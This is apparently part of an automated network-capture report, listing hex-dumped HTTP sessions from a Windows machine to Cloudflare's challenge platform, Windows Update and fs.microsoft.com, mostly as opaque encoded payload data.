                                                                                  2024-04-25 16:23:03 UTC1369INData Raw: 33 61 4b 75 71 32 52 6b 4a 4f 34 73 70 6d 75 6e 4a 74 39 6f 36 4b 2f 73 36 61 6a 71 71 6d 75 67 61 79 4a 73 4a 44 55 68 38 7a 49 6a 36 69 69 30 70 54 4b 6e 4a 72 55 74 38 79 73 76 63 2f 6b 31 72 62 6f 77 72 75 34 37 4f 7a 44 76 63 6d 74 31 4c 36 2b 79 75 47 79 77 73 58 44 30 4c 7a 70 31 74 54 62 75 4e 33 53 37 67 6a 64 32 64 58 6c 34 4e 33 68 39 67 76 73 34 67 45 54 79 75 59 57 41 76 66 57 45 67 62 39 2b 74 6f 58 43 51 44 7a 47 51 58 7a 2b 43 41 44 34 66 73 68 44 75 59 51 4a 52 45 43 4e 44 4c 74 45 78 4c 77 4a 53 49 6a 4a 44 48 35 2b 50 58 37 38 7a 78 44 46 45 42 41 46 51 49 35 43 67 67 45 54 30 45 6e 47 69 6f 6f 4a 52 55 54 57 41 39 52 4b 6b 30 36 4c 56 67 39 4d 46 38 66 59 44 4a 6b 5a 6a 34 6c 5a 32 68 4b 5a 55 52 48 4b 54 39 4b 51 79 39 46 50 6b 4e 59
                                                                                  Data Ascii: 3aKuq2RkJO4spmunJt9o6K/s6ajqqmugayJsJDUh8zIj6ii0pTKnJrUt8ysvc/k1rbowru47OzDvcmt1L6+yuGywsXD0Lzp1tTbuN3S7gjd2dXl4N3h9gvs4gETyuYWAvfWEgb9+toXCQDzGQXz+CAD4fshDuYQJRECNDLtExLwJSIjJDH5+PX78zxDFEBAFQI5CggET0EnGiooJRUTWA9RKk06LVg9MF8fYDJkZj4lZ2hKZURHKT9KQy9FPkNY
                                                                                  2024-04-25 16:23:03 UTC1369INData Raw: 65 32 76 71 70 30 76 38 43 43 67 38 6a 46 73 34 50 48 78 49 75 67 67 63 75 36 6a 4b 6e 55 71 70 58 51 7a 4a 6e 52 31 35 76 50 32 39 76 4a 6d 4e 58 54 6e 74 54 45 75 62 48 54 32 65 6e 42 34 36 32 39 32 63 54 48 32 38 44 51 78 73 44 31 36 38 33 48 30 64 58 74 75 62 30 41 32 37 72 43 75 77 59 44 79 4d 51 4a 39 77 51 4f 44 38 58 61 45 2f 76 38 42 2b 77 57 37 51 55 44 2b 50 67 4b 42 67 73 56 46 50 34 5a 37 52 50 75 49 66 62 6b 49 42 6b 47 39 41 41 6e 42 67 67 4b 45 41 63 53 45 78 41 69 4c 43 30 55 46 78 67 78 2f 69 30 55 4f 42 6b 67 41 30 45 45 50 45 41 72 46 54 51 4c 51 79 49 6a 44 30 59 4c 4a 54 56 52 56 54 56 4a 53 44 46 58 57 55 39 41 49 43 39 5a 51 45 51 63 4c 30 39 6c 51 6d 4a 71 62 53 5a 6c 4f 33 41 35 58 56 78 30 59 44 35 57 62 6c 59 35 64 6b 68 34 53
                                                                                  Data Ascii: e2vqp0v8CCg8jFs4PHxIuggcu6jKnUqpXQzJnR15vP29vJmNXTntTEubHT2enB46292cTH28DQxsD1683H0dXtub0A27rCuwYDyMQJ9wQOD8XaE/v8B+wW7QUD+PgKBgsVFP4Z7RPuIfbkIBkG9AAnBggKEAcSExAiLC0UFxgx/i0UOBkgA0EEPEArFTQLQyIjD0YLJTVRVTVJSDFXWU9AIC9ZQEQcL09lQmJqbSZlO3A5XVx0YD5WblY5dkh4S
                                                                                  2024-04-25 16:23:03 UTC1369INData Raw: 52 78 5a 71 70 70 70 75 65 72 63 44 46 77 71 7a 44 30 61 61 70 78 4a 47 6b 7a 62 50 62 6b 36 71 5a 32 5a 76 4b 76 38 76 53 76 4c 4c 6d 6f 4b 53 30 70 72 6e 63 77 38 69 36 36 4d 58 43 34 2b 66 49 37 4f 37 5a 35 73 32 74 79 76 7a 33 76 77 48 77 2b 4d 76 50 2b 39 66 34 78 77 41 48 35 74 72 34 44 4d 76 39 45 66 30 47 33 42 62 6d 46 2b 73 57 7a 50 58 63 36 76 76 75 2f 52 6e 55 46 67 4d 6b 48 65 44 32 41 67 6b 47 41 41 62 35 35 2f 6f 6d 48 76 4d 7a 42 50 4d 6c 4c 76 55 56 4b 53 55 62 48 66 6b 73 44 6b 48 36 2f 41 4e 44 4f 77 55 53 50 68 70 48 49 68 6f 59 50 6b 30 71 4b 45 38 54 4b 31 63 71 4f 6b 63 54 4d 42 5a 61 46 30 39 68 50 53 51 33 52 45 4e 47 4e 32 6c 5a 4f 53 31 6f 57 45 35 6d 4b 56 4a 76 55 45 52 71 62 31 52 49 5a 6d 39 65 63 48 70 61 61 56 42 67 58 6d
                                                                                  Data Ascii: RxZqpppuercDFwqzD0aapxJGkzbPbk6qZ2ZvKv8vSvLLmoKS0prncw8i66MXC4+fI7O7Z5s2tyvz3vwHw+MvP+9f4xwAH5tr4DMv9Ef0G3BbmF+sWzPXc6vvu/RnUFgMkHeD2AgkGAAb55/omHvMzBPMlLvUVKSUbHfksDkH6/ANDOwUSPhpHIhoYPk0qKE8TK1cqOkcTMBZaF09hPSQ3RENGN2lZOS1oWE5mKVJvUERqb1RIZm9ecHpaaVBgXm
                                                                                  2024-04-25 16:23:03 UTC1369INData Raw: 68 35 6a 42 70 49 62 4a 77 35 75 65 6b 39 58 56 30 63 7a 4b 31 5a 4f 6f 31 62 44 61 30 4d 76 5a 77 64 69 63 77 4d 6e 48 70 75 61 2b 74 64 76 65 35 64 72 75 38 2f 48 4a 79 4c 50 32 30 64 6d 33 74 39 50 48 78 2b 75 35 7a 74 33 58 34 66 51 47 38 2b 62 43 77 76 72 6b 2b 65 66 36 42 39 34 47 38 2b 55 4d 35 41 2f 56 45 77 34 56 46 65 77 58 41 41 77 56 47 2b 37 66 38 51 66 6e 42 4f 45 66 2b 78 77 74 49 77 45 69 41 68 45 43 38 78 49 41 4c 67 6f 6a 48 50 72 76 44 52 51 35 4f 53 4d 69 4f 54 38 62 2b 55 59 33 50 52 59 36 47 53 34 69 4b 51 73 4b 45 56 42 54 44 6b 42 4d 4e 30 77 30 4b 6c 59 66 4c 6c 6f 78 4f 6b 78 58 51 54 63 78 55 55 67 32 51 30 6b 75 53 47 49 72 4c 6e 46 4a 61 43 31 34 5a 46 6f 33 65 54 4a 38 4d 48 39 49 61 6b 78 44 4f 6b 31 39 65 56 78 48 68 6d 78
                                                                                  Data Ascii: h5jBpIbJw5uek9XV0czK1ZOo1bDa0MvZwdicwMnHpua+tdve5dru8/HJyLP20dm3t9PHx+u5zt3X4fQG8+bCwvrk+ef6B94G8+UM5A/VEw4VFewXAAwVG+7f8QfnBOEf+xwtIwEiAhEC8xIALgojHPrvDRQ5OSMiOT8b+UY3PRY6GS4iKQsKEVBTDkBMN0w0KlYfLloxOkxXQTcxUUg2Q0kuSGIrLnFJaC14ZFo3eTJ8MH9IakxDOk19eVxHhmx
                                                                                  2024-04-25 16:23:03 UTC547INData Raw: 71 4b 47 30 70 57 6a 69 73 61 56 6f 35 4b 62 6c 61 37 64 33 65 43 79 33 74 50 53 6e 61 66 6e 34 36 4f 30 78 63 36 37 75 75 71 73 75 38 44 69 79 74 43 75 75 4d 4c 4c 2b 75 66 73 32 4c 62 41 38 72 58 39 7a 66 44 50 78 38 66 45 78 64 55 4c 35 64 7a 61 35 4f 58 6a 46 65 6e 6c 79 52 4d 54 2b 42 62 53 46 2b 72 75 48 69 44 75 39 64 6f 6b 47 4f 50 65 45 69 7a 64 4b 67 45 76 34 65 34 4a 48 51 4c 7a 39 42 62 31 4d 79 67 6e 38 51 59 56 39 51 34 41 51 68 73 4d 44 78 34 39 50 50 6f 7a 42 66 31 4b 52 6b 38 4a 53 77 38 4d 55 51 63 55 48 79 68 57 4c 53 73 34 44 30 73 32 45 68 64 67 55 78 6f 75 48 44 73 77 4d 56 70 47 4c 44 5a 72 51 32 49 35 4f 6d 56 47 63 6d 4e 7a 4b 6e 45 34 4e 44 56 33 50 47 39 2f 4d 30 46 77 55 33 39 45 5a 55 53 43 63 6b 46 4b 68 31 5a 2f 54 34 75 42
                                                                                  Data Ascii: qKG0pWjisaVo5Kbla7d3eCy3tPSnafn46O0xc67uuqsu8DiytCuuMLL+ufs2LbA8rX9zfDPx8fExdUL5dza5OXjFenlyRMT+BbSF+ruHiDu9dokGOPeEizdKgEv4e4JHQLz9Bb1Mygn8QYV9Q4AQhsMDx49PPozBf1KRk8JSw8MUQcUHyhWLSs4D0s2EhdgUxouHDswMVpGLDZrQ2I5OmVGcmNzKnE4NDV3PG9/M0FwU39EZUSCckFKh1Z/T4uB
                                                                                  2024-04-25 16:23:03 UTC1369INData Raw: 31 61 62 39 0d 0a 6f 6b 62 55 73 74 4b 47 45 2f 4b 33 4e 50 5a 43 73 34 51 32 5a 46 50 54 30 36 4f 30 75 41 57 31 4a 51 57 6c 74 5a 69 6c 39 62 50 34 69 49 62 6f 74 49 6a 47 42 6b 6b 35 56 6b 61 31 43 5a 6a 56 6c 55 69 4a 78 64 6d 33 70 68 5a 4b 4e 36 59 33 6d 6e 66 6e 39 39 71 5a 69 59 73 71 32 47 71 48 4b 78 64 61 69 30 73 36 6d 63 69 49 65 48 73 70 4f 4c 67 72 52 37 6a 35 35 2f 6c 34 6e 4c 74 59 6e 4c 70 37 71 6c 69 4d 75 47 30 74 44 57 71 74 62 54 6d 5a 57 55 33 4e 79 65 73 39 37 4d 6f 61 50 66 30 4f 69 6c 36 61 6e 55 71 75 76 6f 38 63 48 74 33 4e 7a 32 38 63 72 73 74 76 57 35 37 50 6a 33 37 65 44 4d 79 38 76 32 31 38 2f 47 2b 4c 2f 54 34 73 50 62 7a 52 44 35 7a 52 44 72 2f 75 6e 4d 45 4d 6f 58 46 52 76 75 47 78 6a 64 32 64 67 68 49 65 4c 33 49 78 48
                                                                                  Data Ascii: 1ab9okbUstKGE/K3NPZCs4Q2ZFPT06O0uAW1JQWltZil9bP4iIbotIjGBkk5Vka1CZjVlUiJxdm3phZKN6Y3mnfn99qZiYsq2GqHKxdai0s6mciIeHspOLgrR7j55/l4nLtYnLp7qliMuG0tDWqtbTmZWU3Nyes97MoaPf0Oil6anUquvo8cHt3Nz28crstvW57Pj37eDMy8v218/G+L/T4sPbzRD5zRDr/unMEMoXFRvuGxjd2dghIeL3IxH
                                                                                  2024-04-25 16:23:03 UTC1369INData Raw: 7a 34 71 62 6b 5a 6f 4d 47 39 67 61 44 42 32 54 6d 78 35 66 47 68 6f 66 58 35 38 66 45 4b 42 52 56 36 4b 68 45 6c 6a 56 6f 68 4e 62 70 4b 4f 66 48 78 4e 6b 6e 39 52 55 70 61 56 61 70 36 59 58 58 5a 63 6e 6e 5a 2b 58 61 4b 51 6f 4b 71 6f 6c 49 4a 6b 71 57 32 59 72 4b 36 73 69 6e 47 77 64 61 32 43 74 48 6d 77 76 72 65 6f 74 48 69 39 67 62 69 41 77 72 47 57 79 73 61 65 78 49 66 4b 6f 71 71 4e 7a 63 75 4e 6b 4e 54 41 73 74 72 56 78 4e 43 56 32 62 4c 49 6e 64 36 31 6f 71 37 68 75 73 4c 71 34 2b 54 47 37 75 72 6f 78 75 33 72 7a 4d 65 2b 74 73 72 49 7a 66 58 30 37 4c 6a 33 2b 4e 36 34 2f 64 62 30 76 51 4c 62 31 73 41 47 42 51 48 4a 43 67 6e 71 7a 51 33 52 42 64 41 56 41 51 48 52 46 68 58 32 47 68 6f 4a 46 53 4d 66 44 66 76 75 49 65 55 5a 35 43 62 2b 49 53 6b 71
                                                                                  Data Ascii: z4qbkZoMG9gaDB2Tmx5fGhofX58fEKBRV6KhEljVohNbpKOfHxNkn9RUpaVap6YXXZcnnZ+XaKQoKqolIJkqW2YrK6sinGwda2CtHmwvreotHi9gbiAwrGWysaexIfKoqqNzcuNkNTAstrVxNCV2bLInd61oq7husLq4+TG7uroxu3rzMe+tsrIzfX07Lj3+N64/db0vQLb1sAGBQHJCgnqzQ3RBdAVAQHRFhX2GhoJFSMfDfvuIeUZ5Cb+ISkq


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.1749726104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:03 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:04 UTC377INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:23:04 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: UOwiPEBy28VhgM0jYJgvlA==$W4AhuVWjT5VtlQcU6fAIiw==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facea699e8bb9-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:04 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.174972852.165.165.26443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:07 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9KOl2MdB5OHyWcF&MD=cOMbbLl7 HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                  Host: slscr.update.microsoft.com
                                                                                  2024-04-25 16:23:07 UTC560INHTTP/1.1 200 OK
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Content-Type: application/octet-stream
                                                                                  Expires: -1
                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                  MS-CorrelationId: 50b84af5-faf7-4d8f-a0c3-0f8a9db67f9f
                                                                                  MS-RequestId: 8c15146b-1be1-4c59-841c-0554c4480bae
                                                                                  MS-CV: rKspRuVghkmKPRSm.0
                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Date: Thu, 25 Apr 2024 16:23:07 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 24490
                                                                                  2024-04-25 16:23:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                  2024-04-25 16:23:07 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.1749734184.31.62.93443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:11 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  Accept-Encoding: identity
                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                  Host: fs.microsoft.com
                                                                                  2024-04-25 16:23:11 UTC467INHTTP/1.1 200 OK
                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                  Content-Type: application/octet-stream
                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                  Server: ECAcc (chd/0790)
                                                                                  X-CID: 11
                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                  X-Ms-Region: prod-eus-z1
                                                                                  Cache-Control: public, max-age=139224
                                                                                  Date: Thu, 25 Apr 2024 16:23:11 GMT
                                                                                  Connection: close
                                                                                  X-CID: 2


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.1749735184.31.62.93443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:11 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  Accept-Encoding: identity
                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                  Range: bytes=0-2147483646
                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                  Host: fs.microsoft.com
                                                                                  2024-04-25 16:23:12 UTC515INHTTP/1.1 200 OK
                                                                                  ApiVersion: Distribute 1.1
                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                  Content-Type: application/octet-stream
                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                  Server: ECAcc (chd/0758)
                                                                                  X-CID: 11
                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                  X-Ms-Region: prod-eus-z1
                                                                                  Cache-Control: public, max-age=139223
                                                                                  Date: Thu, 25 Apr 2024 16:23:12 GMT
                                                                                  Content-Length: 55
                                                                                  Connection: close
                                                                                  X-CID: 2
                                                                                  2024-04-25 16:23:12 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.1749736104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:29 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 31888
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: f892c8713b88792
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:29 UTC16384OUTData Raw: 76 5f 38 37 39 66 61 63 63 62 66 65 38 66 62 30 36 61 3d 57 69 74 55 72 41 6f 34 4b 43 30 5a 74 41 62 69 6a 7a 71 42 78 45 71 42 24 2d 6f 4d 24 4f 55 4c 74 24 49 70 24 79 55 42 69 71 43 24 71 24 4c 47 55 24 6b 74 24 78 55 6a 4b 6f 38 24 70 55 6c 30 6f 42 6a 24 46 69 47 43 44 6c 4c 55 45 24 6d 24 59 30 24 4e 45 4e 6c 55 55 70 24 63 6b 74 24 70 24 74 30 24 4f 68 46 71 24 6f 2d 63 42 32 48 32 46 24 44 4e 4f 6d 72 74 24 65 74 24 73 24 74 69 6f 6d 24 46 70 4e 45 57 43 24 6a 6b 45 24 6a 70 39 46 33 24 24 61 4d 71 6c 24 79 6b 37 46 6a 77 7a 24 68 61 41 24 6c 25 32 62 41 74 49 46 48 24 41 4e 39 47 56 6a 70 55 7a 45 4b 6e 35 66 34 56 65 47 24 57 42 45 24 77 44 61 47 30 6c 4a 4a 42 44 24 4b 30 61 5a 76 62 47 6e 4c 32 41 49 49 30 34 32 49 6a 53 31 51 41 36 6c 41 51
                                                                                  Data Ascii: v_879faccbfe8fb06a=WitUrAo4KC0ZtAbijzqBxEqB$-oM$OULt$Ip$yUBiqC$q$LGU$kt$xUjKo8$pUl0oBj$FiGCDlLUE$m$Y0$NENlUUp$ckt$p$t0$OhFq$o-cB2H2F$DNOmrt$et$s$tiom$FpNEWC$jkE$jp9F3$$aMql$yk7Fjwz$haA$l%2bAtIFH$AN9GVjpUzEKn5f4VeG$WBE$wDaG0lJJBD$K0aZvbGnL2AII042IjS1QA6lAQ
                                                                                  2024-04-25 16:23:29 UTC15504OUTData Raw: 4e 71 24 59 65 56 73 67 31 45 77 55 6c 24 65 24 41 45 6f 4b 24 42 24 6f 42 65 55 57 74 24 34 24 7a 55 57 77 47 33 24 38 45 42 55 24 42 24 32 24 5a 47 71 34 24 56 24 6c 74 41 6a 74 6c 55 71 74 71 51 24 48 55 42 4b 71 42 24 38 55 59 4b 41 54 24 78 24 77 47 24 36 24 76 55 46 30 71 2d 24 47 69 52 69 6f 6e 24 7a 24 38 74 71 75 67 35 55 4c 24 41 74 24 43 24 77 4b 24 55 24 42 47 57 55 41 5a 24 51 24 57 4b 24 74 24 70 24 4c 6c 24 6a 24 45 45 6f 24 6a 7a 24 73 24 4c 47 71 2d 55 74 24 42 74 71 4d 45 62 24 61 74 24 43 24 6a 24 43 4b 24 38 24 5a 55 77 4b 6f 55 24 49 30 6c 35 6f 30 6f 59 55 59 30 6f 45 24 57 55 71 47 6f 39 47 39 24 24 55 41 70 24 63 24 77 4b 71 48 47 52 34 6a 51 51 41 24 67 24 77 52 69 52 35 74 24 5a 59 6f 67 24 70 35 41 35 71 42 24 33 24 77 47 41 69
                                                                                  Data Ascii: Nq$YeVsg1EwUl$e$AEoK$B$oBeUWt$4$zUWwG3$8EBU$B$2$ZGq4$V$ltAjtlUqtqQ$HUBKqB$8UYKAT$x$wG$6$vUF0q-$GiRion$z$8tqug5UL$At$C$wK$U$BGWUAZ$Q$WK$t$p$Ll$j$EEo$jz$s$LGq-Ut$BtqMEb$at$C$j$CK$8$ZUwKoU$I0l5o0oYUY0oE$WUqGo9G9$$UAp$c$wKqHGR4jQQA$g$wRiR5t$ZYog$p5A5qB$3$wGAi
                                                                                  2024-04-25 16:23:30 UTC1246INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cf-chl-out: 3AoM4Dm2Wyy2ccY47JAScLJ11V2w9+YewnLlkWZhGkYeZuc3RspmTNhhOZMicQ3ehd0g4gH+wFqxAnylJzVR59Bjqq7RyXByHRnjSyW/pIwSK07XVqXtchPvSqT/6uer$ZVVjiq1ZR6CwBp5P7B5SBA==
                                                                                  cf-chl-out-s: j/Xyo3dk+f+DirHVlCtjqnzJQhoqgiN3IhsUtqpAdT7yQzsmZ0mj4A1FTsQ1vifojKyPfyYvYEHBzr7AGLvmU/dDKoD3YVFkpYNb0nkX0cNxew6FXvE3g7OuTRdgpVXE3Mz6F52WAW3z8Lle/5DXVO9k+nN4BvsxFpnwReUKwiq9ukC56rzfhH/yBkpDlkAgJf3uGU4yMyesvEQe80AdAdbyj+95goCTAevjI5jNRQOMZtBIz0Anj4XoVUyxSPsXN9bl+m6laXWXsj5y4FpgQy9hQp7untz2TJ1StHKlOZiQU04PME7rfeDI298+kq5SqGofeuO/wtcvnt7D/cP8ZFzKwMdufBnyHTAtSkxJPpqpG8qUxNRAMXMxAMzNQlgkAeadndK7cYH/3HeqxgmyllIRtmZXDUiOG0uyG61ndDCQaELvlipDFQISTY5rrlYXGogOzYoxsGsaG1e53NOgutbWdBmtIRafcdeUhllVzMzEFtRhdkKEfKAabVE4/soaLuD8pc3g54NlqWhkRm58G+Zxt6au4i5Ky/tFXHtijg62Lg8exS0TKkQosy88m4UDIqfR5670vUCM7ci/LrBtHm2YwvdrIQZrgtVzEujAOHh1Pob632n1zyg3Kp2kt5EBbwxt68Tb+DffBgTQcMPXJyB+7MlU8X8gah3LhR8Osg1uCZJeNxjaUGV08X/i7sCXBvXmanKJQzfJpXwoD+BRyR/+/Ut2DLGl7wN9MXbRkjEO2s+1qIljB32bRf2h8qUtuSz+hoTmrBAWTxW0ZmJLLg==$mkcaG9OV65Nr3uzrQjqtjg==
                                                                                  vary: accept-encoding
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fad8caf0b06f2-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:30 UTC123INData Raw: 34 37 33 0d 0a 68 61 70 35 74 62 65 42 75 37 36 2f 72 37 50 49 79 62 6d 6c 78 70 2b 73 71 35 32 52 77 4b 71 52 6b 39 54 4d 74 73 76 4d 74 36 79 77 6c 62 2f 68 76 72 54 61 6f 65 43 76 6e 39 79 36 77 62 62 6c 76 73 57 36 72 4c 48 4d 7a 71 75 39 34 37 48 53 30 74 71 31 31 75 69 34 38 39 66 30 76 50 71 32 32 4e 54 61 2f 4d 66 6c 33 2b 44 66 2f 63 62 36 34 41 48 4b 35 75
                                                                                  Data Ascii: 473hap5tbeBu76/r7PIybmlxp+sq52RwKqRk9TMtsvMt6ywlb/hvrTaoeCvn9y6wbblvsW6rLHMzqu947HS0tq11ui489f0vPq22NTa/Mfl3+Df/cb64AHK5u
